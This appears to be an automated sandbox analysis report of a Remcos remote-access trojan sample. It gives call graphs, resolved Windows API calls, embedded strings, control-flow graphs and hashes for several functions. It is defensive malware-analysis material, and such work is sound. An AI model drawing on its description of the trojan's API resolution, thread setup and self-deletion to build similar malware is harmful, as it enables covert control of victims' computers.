404457 47176->47181 47177->47160 47178 404418 47182 401f66 28 API calls 47178->47182 47183 401f66 28 API calls 47179->47183 47264 420f34 55 API calls 47180->47264 47184 41a686 79 API calls 47181->47184 47186 404427 47182->47186 47187 404324 47183->47187 47184->47210 47189 41a686 79 API calls 47186->47189 47190 401f66 28 API calls 47187->47190 47188 404354 47191 404389 47188->47191 47192 404359 47188->47192 47193 40442c 47189->47193 47196 404333 47190->47196 47266 4202ea 28 API calls 47191->47266 47194 401f66 28 API calls 47192->47194 47195 401eea 26 API calls 47193->47195 47198 404368 47194->47198 47195->47210 47199 41a686 79 API calls 47196->47199 47201 401f66 28 API calls 47198->47201 47202 404338 47199->47202 47200 404391 47203 4043be CreateEventW CreateEventW 47200->47203 47205 401f66 28 API calls 47200->47205 47204 404377 47201->47204 47257 420191 47202->47257 47203->47210 47206 41a686 79 API calls 47204->47206 47208 4043a7 47205->47208 47209 40437c 47206->47209 47211 401f66 28 API calls 47208->47211 47265 420592 53 API calls 47209->47265 47210->46792 47213 4043b6 47211->47213 47214 41a686 79 API calls 47213->47214 47215 4043bb 47214->47215 47215->47203 47217 404805 SetEvent CloseHandle 47216->47217 47218 40481c closesocket 47216->47218 47219 40489c 47217->47219 47220 404829 47218->47220 47219->46792 47221 404838 47220->47221 47222 40483f 47220->47222 47271 404ab1 83 API calls 47221->47271 47224 404851 WaitForSingleObject 47222->47224 47225 404892 SetEvent CloseHandle 47222->47225 47226 420191 3 API calls 47224->47226 47225->47219 47227 404860 SetEvent WaitForSingleObject 47226->47227 47228 420191 3 API calls 47227->47228 47229 404878 SetEvent CloseHandle CloseHandle 47228->47229 47229->47225 47230->46792 47231->46792 47232->46792 47233->46792 47234->46792 47235->46792 47236->46792 47237->46792 47238->46832 47239->46832 47240->46832 47241->46832 47242->46832 47243->46832 47244->46832 47245->46832 47246->46832 47247->46832 47248->47132 47249->47140 47250->47148 47251->47150 47255 404b29 101 API calls 47252->47255 47254 404b26 47255->47254 47256->47168 47258 41dc15 47257->47258 47259 420199 47257->47259 47260 41dc23 47258->47260 47269 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47258->47269 47259->47210 47270 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47260->47270 47263 41dc2a 47264->47188 47265->47202 47266->47200 47267->47171 47268->47178 47269->47260 47270->47263 47271->47222 47273->46858 47274->46884 47275->46883 47276->46872 47277->46876 47278->46882 47280 40e56a 47279->47280 47281 4124b7 3 API calls 47280->47281 47282 40e60e 47280->47282 47284 40e5fe Sleep 47280->47284 47301 40e59c 47280->47301 47281->47280 47315 4082dc 28 API calls 47282->47315 47284->47280 47287 41ae08 28 API calls 47287->47301 47288 40e619 47289 41ae08 28 API calls 47288->47289 47290 40e625 47289->47290 47316 412774 29 API calls 47290->47316 47293 401e13 26 API calls 47293->47301 47294 40e638 47295 401e13 26 API calls 47294->47295 47297 40e644 47295->47297 47296 401f66 28 API calls 47296->47301 47298 401f66 28 API calls 47297->47298 47299 40e655 47298->47299 47302 4126d2 29 API calls 47299->47302 47300 4126d2 29 API calls 47300->47301 47301->47284 47301->47287 47301->47293 47301->47296 47301->47300 47312 40bf04 73 API calls ___scrt_fastfail 47301->47312 47313 4082dc 28 API calls 47301->47313 47314 412774 29 API calls 47301->47314 47303 40e668 47302->47303 47317 411699 TerminateProcess WaitForSingleObject 47303->47317 47305 40e670 ExitProcess 47318 411637 60 API calls 47306->47318 47313->47301 47314->47301 47315->47288 47316->47294 47317->47305

                              Executed Functions

                              Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleLibraryLoadModule
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                              • API String ID: 384173800-625181639
                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                              Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 89 40d9b5-40d9bc 79->89 90 40d9ae-40d9b0 79->90 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 94 40d9c0-40d9cc call 41a463 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 99->79 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 190 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->190 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->220 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 176 40dbc0-40dbe4 call 4022f8 call 4338c8 169->176 170->176 198 40dbf3 176->198 199 40dbe6-40dbf1 call 436050 176->199 190->163 204 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 204->258 273 40dd79-40dd7b 220->273 274 40dd5e 220->274 258->220 272 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->272 272->220 292 40dc93 272->292 277 40dd81 273->277 278 40dd7d-40dd7f 273->278 276 40dd60-40dd77 call 41beb0 CreateThread 274->276 279 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 276->279 277->279 278->276 330 40dea1 279->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->344 353 40df6c-40df7f call 401d64 call 401e8f 343->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->354 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 392 40e004-40e00b 389->392 393 40dff8-40e002 CreateThread 389->393 394 40e019-40e020 392->394 395 40e00d-40e017 CreateThread 392->395 393->392 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                              APIs
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000104), ref: 0040D790
                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                              • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-4NJUM7$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                              • API String ID: 2830904901-2551881949
                              • Opcode ID: 3b90c21d5bd73402e256c1a4d47754fca53287f9523db6933c1034fb3aade655
                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                              • Opcode Fuzzy Hash: 3b90c21d5bd73402e256c1a4d47754fca53287f9523db6933c1034fb3aade655
                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                              Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                              • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                              • ExitProcess.KERNEL32 ref: 0040E672
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                              • API String ID: 2281282204-3981147832
                              • Opcode ID: f1e844b88154ea7f944469d923261dc4d8bc71d11c32eb7a6dd001ac4c6178c6
                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                              • Opcode Fuzzy Hash: f1e844b88154ea7f944469d923261dc4d8bc71d11c32eb7a6dd001ac4c6178c6
                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                              Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1182 4049b3-4049b7 1180->1182 1183 404933-404937 1181->1183 1184 404939-404940 1181->1184 1185 404987-4049af CreateEventA CreateThread 1183->1185 1184->1185 1186 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1184->1186 1185->1182 1186->1185
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 00404946
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$EventLocalThreadTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 2532271599-1507639952
                              • Opcode ID: 9dba7f291707fb6dee9b06b989ff2bbd9281d571ddecfbbe513a7e639189b983
                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                              • Opcode Fuzzy Hash: 9dba7f291707fb6dee9b06b989ff2bbd9281d571ddecfbbe513a7e639189b983
                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                              Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Crypt$Context$AcquireRandomRelease
                              • String ID:
                              • API String ID: 1815803762-0
                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                              Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser
                              • String ID:
                              • API String ID: 4229901323-0
                              • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                              • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                              Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
